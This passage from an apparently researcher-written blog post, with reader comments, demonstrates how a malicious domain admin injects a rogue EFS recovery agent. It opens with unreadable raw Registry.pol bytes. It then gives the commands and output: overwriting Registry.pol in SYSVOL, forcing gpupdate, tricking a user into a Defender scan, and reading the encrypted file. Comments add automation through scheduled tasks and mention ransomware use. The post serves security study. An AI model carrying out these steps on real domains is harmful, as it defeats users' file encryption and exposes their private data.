 ‚ C'úgñ<@¢¢§ïÖîF´r=D¯pmò*ë4þ ãqº¨(±c“¿ A!†ÖŽ§Hƒ5Ôn·”[òØ`Š/ã4nøF¡Bdú’[bíŠ µÀŠ…‡ß=Sð_Oúß?ünîiotc²`/äu"cÁÃ*ÿ~ÕñhÕǘ¥Óz~=
QÖÙÁÉè­6Ä1¢Ë—}ãªSp­nF„q·za{ìÔÇ*õTÜ)5q»xÓ‹p۝½Ú}¡PöžÌøwb6%¦®ÎÀM¤iõf¬
µëÊFCFi)¿y<§’ó¸µ*<¿B¢?³Æïòv:ã!ÒɁ7ˆ"ô¸] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ E F S \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ E F S \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E _ N K P \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E _ N K P \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ F V E _ N K P \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ R o o t \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ R o o t \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ R o o t \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P e o p l e \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P e o p l e \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P e o p l e \ C T L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P u b l i s h e r \ C e r t i f i c a t e s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P u b l i s h e r \ C R L s   ;   ;     ;     ; ] [ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ S y s t e m C e r t i f i c a t e s \ T r u s t e d P u b l i s h e r \ C T L s   ;   ;     ;     ; ] 

Evil Admin swaps registry.pol file

For this step, it is important that this is an elevated admin shell. The Evil Admin transfer the prepared .pol file to the attacked DC, then replaces the legit file by the evil version. (What remains to be tested is how that works out in a domain with more than one DC.)

copy "C:\Evil Folder\Registry.pol_evil" C:\Windows\SYSVOL\domain\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol Overwrite Registry.pol? (Yes/No/All): Yes 1 file(s) copied.

Evil Admin updates GPO

To finally get the evil settings ‘down’ to the registry (also on the DC itself this is required to activate the settings), the Evil Admin has to update computer policy:

C:\Evil Folder>gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

User does a custom virus scan

Evil admin social engineers the user to run a custom scan on his personal files with Defender. Normally the user would use the GUI, right-click some top folder containing also the interesting EFS files, and choose to scan with Defender.

For completeness, the command is:

"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\Users\efsfreak\Desktop\EFS Files"
Scan starting...
Scan finished.
Scanning C:\Users\efsfreak\Desktop\EFS Files found no threats.

Evil Admin reads the victim’s file

Evil Admin still has their shell open. After Defender has touched the files in the context of / on behalf of the user, Evil Admin can finally read the contents.

C:\Evil Folder>whoami
secret\eviladmin

C:\Evil Folder>type "C:\users\efsfreak\Desktop\EFS Files\efs.txt"
This is my secret file

EFS meta-data show the hash of the evil ‘injected’ DRA certificate now:

C:\Evil Folder>cipher /C "C:\Users\efsfreak\Desktop\EFS Files\efs.txt"

 Listing C:\Users\efsfreak\Desktop\EFS Files\
 New files added to this directory will not be encrypted.

E efs.txt
  Compatibility Level:
    Windows XP/Server 2003

  Users who can decrypt:
    SECRET\efsfreak [efsfreak(efsfreak@secret.key)]
    Certificate thumbprint: 23CD E0CD DD5D 9D9A 9637 2A95 75F2 F78B C38A 5199

  Recovery Certificates:
    eviladmin(eviladmin@SECRET)
    Certificate thumbprint: 2AAC 2542 20AF 39D4 6ED7 68A7 CC18 5CFF 4040 00FD

  Key Information:
    Algorithm: AES
    Key Length: 256
    Key Entropy: 256

Update: Fully automate the attack

I got a most interesting suggestion to amend to attack, by security expert Ivo Vitorino: You actually do not even need to social engineer the user to make them them virus scan their files (or touch them otherwise).

As an administrator or system (in an elevated shell), you can add a scheduled task that will run in the context of the logged on user. This is done by adding the group Users.

Thus you can create a the task for the group Users, for touching all files with the cipher tool, set it to run in a few minutes in the future. The you wait for these few minutes, read or copy the interesting content, and finally delete the task again.

4 thoughts on “Injecting an EFS Recovery Agent – and Let the Virus Scanner Help You!

  1. No, you inject (or just create) the task to run on the system to all users, example run it every 2 hours. If the task runs when the target user is logged in, the task will run under the user security context… the task does not even requires high privileges to run. Without disclose further details (but i am pretty sure you already got there) a privileged user (EVIL admin) can easily deploy and use EFS as ransomware :-)

  2. Hi Elke, an EVIL admin, will also deploy a scheduled task to run on the victim computer to “touch” all files (cipher /U)… this way the malicious DRA will be updated immediately and we don’t need to ask user any think. ;-)

    1. Hi Ivo, that sounds like a really cool update of the attack – but isn’t the evil admin prompted for the user’s password when trying to create a scheduled task running as the user? ‘Injecting’ a logon script into SYSVOL along these lines could also work!

Leave a Comment

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.